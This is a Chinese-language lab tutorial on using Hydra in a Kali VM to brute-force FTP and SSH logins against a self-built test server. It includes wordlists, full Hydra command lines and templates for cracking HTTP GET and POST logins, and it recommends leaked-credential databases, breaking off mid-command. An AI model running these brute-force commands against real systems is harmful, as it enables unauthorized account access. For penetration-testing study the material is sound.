参考链接添加链接描述
一、测试用环境
kali虚拟机
前文搭建了ftp服务器进行测试
二、测试步骤
已知登录界面账号为admin密码为admin
1.常用参数
-R 根据上一次进度继续破解
-S 使用SSL协议连接
-s 指定端口
-l 指定用户名
-L 指定用户名字典(文件)
-p 指定密码破解
-P 指定密码字典(文件)
-e 空密码探测和指定用户密码探测(ns)
-C 用户名可以用:分割(username:password)可以代替-l username -p password
-o 输出文件
-t 指定多线程数量,默认为16个线程
-vV 显示详细过程
2.创建密码字典和用户名字典
创建简单的username字典
kali@kali:~/Desktop$ vim username.txt
kali@kali:~/Desktop$ cat us
username.txt usr/
kali@kali:~/Desktop$ cat username.txt
123456
789456
root
user
abc123
admin
kali@kali:~/Desktop$
创建简单的password字典
kali@kali:~/Desktop$ vim password.txt
kali@kali:~/Desktop$ cat password.txt
123456
abcde
000000
888888
root
admin
111111
kali@kali:~/Desktop$
3.进行ftp爆破登录测试
kali@kali:~$ hydra -L /home/kali/Desktop/username.txt -P /home/kali/Desktop/password.txt -e ns -t 16 -vV 192.168.100.130 ftp
可以看到最后的绿字爆破成功!
4.进行ssh爆破登录测试
命令变化不大,只是后面的协议方式变为了ssh
kali@kali:~$ hydra -L /home/kali/Desktop/username.txt -P /home/kali/Desktop/password.txt -e ns -t 16 -vV -f 192.168.100.130 ssh
为了完成爆破密码的步骤,需要一个强大的社工库,当密码字典足够强大的时候会让渗透工作事半功倍,同时hybra还支持多种协议例如:
get方式提交,破解web登录:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
post方式提交,破解web登录:
hydra -l 用户名 -P 密码字典 -s 80 ip